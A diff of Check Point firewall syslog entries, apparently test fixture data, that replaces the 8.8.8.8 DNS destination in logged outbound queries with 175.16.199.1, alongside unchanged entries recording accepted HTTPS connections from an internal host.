-<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59409"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59409"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503099"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50380"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38203"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503101"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38203"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36808"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49780"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34551"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49780"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34551"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51254"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58790"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59605"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42076"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59605"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42076"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46850"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37888"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52971"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55167"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52594"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52971"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
